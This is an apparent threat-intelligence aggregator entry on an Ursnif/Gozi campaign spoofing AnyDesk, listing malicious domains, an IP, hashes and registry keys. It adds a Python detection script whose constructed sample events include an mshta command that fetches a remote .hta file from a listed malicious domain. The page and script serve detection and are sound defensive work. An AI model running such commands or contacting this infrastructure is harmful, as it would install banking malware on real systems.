Silent Push uncovers a large Russian Ursnif/Gozi banking trojan operation targeting global AnyDesk users. — Silent Push Threat Intelligence
Tags
cmtmf-attack-pattern: | Code Injection |
country: | Russia |
maec-delivery-vectors: | Watering Hole |
attack-pattern: | Direct Code Injection (T1540); Domains (T1583.001); Domains (T1584.001); Malicious File (T1204.002); Malware (T1587.001); Malware (T1588.001); Mshta (T1218.005); Phishing (T1660); Phishing (T1566); Remote Access Software (T1663); SEO Poisoning (T1608.006); Software (T1592.002); Mshta (T1170); Remote Access Tools (T1219) |
Common Information
Type | Value |
---|---|
UUID | 39a614ec-aca1-4c1c-acc2-851597575400 |
Fingerprint | 9093df9b95f33a9 |
Analysis status | DONE |
Considered CTI value | 0 |
Text language | |
Published | Dec. 19, 2024, midnight |
Added to db | Nov. 6, 2023, 8:05 p.m. |
Last updated | Nov. 14, 2024, 2:04 p.m. |
Headline | Silent Push uncovers a large Russian Ursnif/Gozi banking trojan operation targeting global AnyDesk users. |
Title | Silent Push uncovers a large Russian Ursnif/Gozi banking trojan operation targeting global AnyDesk users. — Silent Push Threat Intelligence |
Detected Hints/Tags/Attributes | 38/4/17 |
Source URLs
URL Provider
RSS Feed
Id | Enabled | Feed title | Url | Added to db |
---|---|---|---|---|
374 | ✔ | — | https://www.silentpush.com/blog?format=rss | 2024-08-30 22:08 |
Attributes
Type | #Events | CTI | Value |
---|---|---|---|
Domain | 1 | | anydesk-access.com |
Domain | 7 | | anydesk.com |
Domain | 1 | | golunki.com |
Domain | 1 | | 4zuki.com |
Domain | 3 | | reggy505.ru |
Domain | 5 | | gameindikdowd.ru |
Domain | 5 | | jhgfdlkjhaoiu.su |
Domain | 372 | | wscript.shell |
Domain | 4 | | silentpush.com |
Domain | 5 | | iujdhsndjfks.ru |
File | 39 | | anydesk.exe |
File | 36 | | c:\windows\system32\mshta.exe |
md5 | 1 | | f04469b9a67701e9da38b1d86a10546e |
sha256 | 1 | | 61e2f9029baf7ce21d8de2eddea55405f20ed5db26ecbdaea42404ca28a08d7c |
IPv4 | 3 | | 94.198.54.97 |
Windows Registry Key | 1 | | HKCU\Software\AppDataLow\Software\Microsoft\CE576D4B-D57C-3028-CFE2-D96473361DD8\StopTest |
Windows Registry Key | 1 | | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES |
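The attribute table above is a raw extraction, and not every row is usable as-is: anydesk.com and silentpush.com are legitimate sites, "wscript.shell" is the ProgID of the Windows Script Host COM object rather than a domain, and HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates is the standard Windows trusted-root store that normal certificate updates touch. The following is an added example (not code from Silent Push or from the aggregator) that turns the remaining indicators into an offline triage script run over a few constructed, Sysmon-like event records. The event schema, the sample records, and the assumption that Gozi keeps its configuration under any GUID-named subkey of HKCU\Software\AppDataLow\Software\Microsoft (generalising the single key the page lists) are this example's own.

```python
"""Offline IOC triage for the Ursnif/Gozi indicators listed on this page.

Added example: the indicator values are copied from the attribute table above;
the event schema and sample records below are constructed for the example.
"""
import re

# Indicators copied from the page's attribute table.
IOC_DOMAINS = {
    "anydesk-access.com", "golunki.com", "4zuki.com", "reggy505.ru",
    "gameindikdowd.ru", "jhgfdlkjhaoiu.su", "iujdhsndjfks.ru",
}
IOC_IPS = {"94.198.54.97"}
IOC_HASHES = {  # md5 and sha256 from the page, lower-case
    "f04469b9a67701e9da38b1d86a10546e",
    "61e2f9029baf7ce21d8de2eddea55405f20ed5db26ecbdaea42404ca28a08d7c",
}
IOC_REG_KEYS = {
    r"HKCU\Software\AppDataLow\Software\Microsoft\CE576D4B-D57C-3028-CFE2-D96473361DD8\StopTest",
}
# Extracted by the aggregator too, but legitimate: never alert on these alone.
# The HKLM AuthRoot key from the table is likewise omitted: it is the normal
# Windows trusted-root store and would match on every host.
BENIGN_DOMAINS = {"anydesk.com", "silentpush.com"}

# Assumption (not from the page): Gozi keeps its config under a GUID-named
# subkey of HKCU\Software\AppDataLow\Software\Microsoft, so any key of that
# shape is worth a look, not only the one GUID the page lists.
GOZI_KEY_RE = re.compile(
    r"^HKCU\\Software\\AppDataLow\\Software\\Microsoft\\"
    r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\\", re.IGNORECASE)


def normalize_domain(name):
    return name.strip().rstrip(".").lower()


def domain_hit(name):
    """Exact or subdomain match against IOC_DOMAINS; benign names never hit.
    'anydesk-access.com' hits, 'anydesk.com' and 'www.anydesk.com' do not."""
    name = normalize_domain(name)
    if name in BENIGN_DOMAINS or any(name.endswith("." + b) for b in BENIGN_DOMAINS):
        return None
    for ioc in IOC_DOMAINS:
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def match_event(ev):
    """Return the list of reasons an event matches; an empty list means clean."""
    reasons = []
    kind = ev.get("event")
    if kind == "DnsQuery":
        ioc = domain_hit(ev.get("query", ""))
        if ioc:
            reasons.append(f"dns:{ioc}")
    elif kind == "NetworkConnect":
        if ev.get("dst_ip") in IOC_IPS:
            reasons.append(f"ip:{ev['dst_ip']}")
    elif kind == "ProcessCreate":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        if image.endswith("\\mshta.exe"):
            # T1218.005: mshta fetching content from a URL. An IOC domain in
            # the command line is a strong hit; any other URL is a weaker one.
            for host in re.findall(r"https?://([^/\s\"']+)", cmd, re.IGNORECASE):
                ioc = domain_hit(host)
                reasons.append(f"mshta:{ioc}" if ioc else f"mshta:url:{host.lower()}")
        if "wscript.shell" in cmd.lower():   # listed on the page as an indicator
            reasons.append("wscript.shell")
        if ev.get("sha256", "").lower() in IOC_HASHES or ev.get("md5", "").lower() in IOC_HASHES:
            reasons.append(f"hash:{ev.get('image')}")
    elif kind == "RegistryValueSet":
        key = ev.get("key", "")
        if key in IOC_REG_KEYS:
            reasons.append("reg:exact")
        elif GOZI_KEY_RE.match(key):
            reasons.append("reg:appdatalow-guid")
    return reasons


def triage(events):
    """Map event index -> reasons, for every event that matched something."""
    return {i: r for i, r in ((i, match_event(e)) for i, e in enumerate(events)) if r}


# Constructed sample telemetry (invented for this example, not real logs).
SAMPLE_EVENTS = [
    {"event": "DnsQuery", "query": "www.anydesk.com"},                 # real vendor, clean
    {"event": "DnsQuery", "query": "anydesk-access.com"},              # look-alike domain
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "https://gameindikdowd.ru/a.hta"'},
    {"event": "ProcessCreate", "image": r"C:\Users\u\Downloads\anydesk.exe",
     "cmdline": "anydesk.exe",
     "sha256": "61e2f9029baf7ce21d8de2eddea55405f20ed5db26ecbdaea42404ca28a08d7c"},
    {"event": "NetworkConnect", "dst_ip": "94.198.54.97"},
    {"event": "RegistryValueSet",
     "key": r"HKCU\Software\AppDataLow\Software\Microsoft\0A1B2C3D-1111-2222-3333-444455556666\Main"},
    {"event": "RegistryValueSet",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES"},
]

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["event"], why)
```

Domain matching is done on the registrable name plus any subdomain, with the benign vendor and publisher names allow-listed first, so a DNS query for www.anydesk.com stays clean while anydesk-access.com and any host under the listed .ru/.su domains hit. The hash, IP and exact-key matches are straightforward set lookups; the GUID-shaped AppDataLow key is the one generalisation beyond the page, and it is labelled as an assumption in the code.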